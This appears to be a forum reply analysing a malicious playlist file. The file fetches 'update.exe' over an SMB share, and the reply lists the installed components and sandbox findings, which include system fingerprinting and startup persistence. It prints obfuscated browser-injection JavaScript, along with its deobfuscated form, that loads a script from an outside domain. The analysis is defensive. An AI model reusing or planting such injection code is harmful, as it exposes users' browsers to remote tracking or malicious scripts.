Yes, this is definetly malicious. The “exploit” is simple: Somehow they managed to download a playlist file to you, which will run an application. As you can see in the text-file:
If this file is executed, it is supposed to download the above file via an SMB share (which you can see because it starts with a \\, it's a network share). At the time of this post, the IP supresses any ping requests, but the SMB share is still up and running. In the \Users directory, there's an "Administartor" and a "Public" folder, but there's no files on it except for the file mentioned above. In this directory you will find a 4.25 MB big file "update.exe", created on October 12th 2015, according to the metadata. Here's a virustotal link: https://www.virustotal.com/de/file/084fa217f3acad97b5f9e95ee776f8fd85dfe6dbfd12194b10102e37f29bb4b0/analysis/1444926798/. If you unpack this .exe file, you will see the files it will try to install:
15.10.2015 21:05 <DIR> .
15.10.2015 21:05 <DIR> ..
15.10.2015 21:05 <DIR> $PLUGINSDIR
15.10.2015 21:05 <DIR> $SYSDIR
15.10.2015 21:05 <DIR> $WINDIR
04.10.2015 05:41 303.104 freebl3.dll
04.10.2015 05:41 295.424 libnspr4.dll
04.10.2015 05:41 48.640 libplc4.dll
04.10.2015 05:41 46.080 libplds4.dll
04.10.2015 05:41 184.224 N1Cert.dll
04.10.2015 05:41 284.544 N1LSP.exe
04.10.2015 05:41 116 N1LSP.ini
04.10.2015 05:41 328.560 N1LSP64.exe
04.10.2015 05:41 324.760 N1Service.dll
04.10.2015 05:41 1.314.616 N1Service.exe
04.10.2015 05:41 51.936 N1Service.tlb
04.10.2015 05:41 370.744 N1Service64.dll
04.10.2015 05:41 847.872 NMI.dll
04.10.2015 05:41 854.528 nss3.dll
04.10.2015 05:41 417.280 nssckbi.dll
04.10.2015 05:41 164.352 nssdbm3.dll
04.10.2015 05:41 135.680 nssutil3.dll
04.10.2015 05:41 51.936 PCProxy.tlb
04.10.2015 05:41 132.608 smime3.dll
04.10.2015 05:41 230.400 softokn3.dll
04.10.2015 05:41 455.168 sqlite3.dll
04.10.2015 05:41 228.352 ssl3.dll
Most notably, the files inside “$Sysdir” with the names “N1Service.ini” and “N1ServiceOff” indicate that some services will be installed on your computer, and under “$WINDIR\msservice\MSService.xml” you will even find a nice javascript which will be injected in your webbrowser.
document.write("<scr" + "ipt type='text/javascript'>var d='.'; var tld='xyz'; var dm='nwcdn'; var analytics='b'; var e='js'; var f='placement';");
document.write("</" + "scr" + "ipt>");
document.write("<scr" + "ipt type='text/javascript' src='//" + analytics + d + dm + d + tld + "/" + f + d + e + "'>");
document.write("</" + "scr" + "ipt>");
The document.write()s can be deobfuscated to
<script type='text/javascript'>var d='.'; var tld='xyz'; var dm='nwcdn'; var analytics='b'; var e='js'; var f='placement';
</script>
<script type='text/javascript' src='//b.nwcdn.xyz/placement.js'> </script>
A malwr.com analysis further shows that it
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
Installs itself for autorun at Windows startup
The "N1LSP.exe" is part of the "Network Manager Suite", published by "Nite Media LLC" (this seems to be actually legit software according to [url=http://"http://appquantify.com/p154964-network-manager-suite.aspx"]this[/url]), which runs approx. 0.5 seconds after the update.exe is executed, according to the malwr.com behavior analysis. So all in all, seems like a good package of malware and surveilence software which the "update.exe" tries to download and execute on your computer. Especially look to clean up for any services and files which are listed above.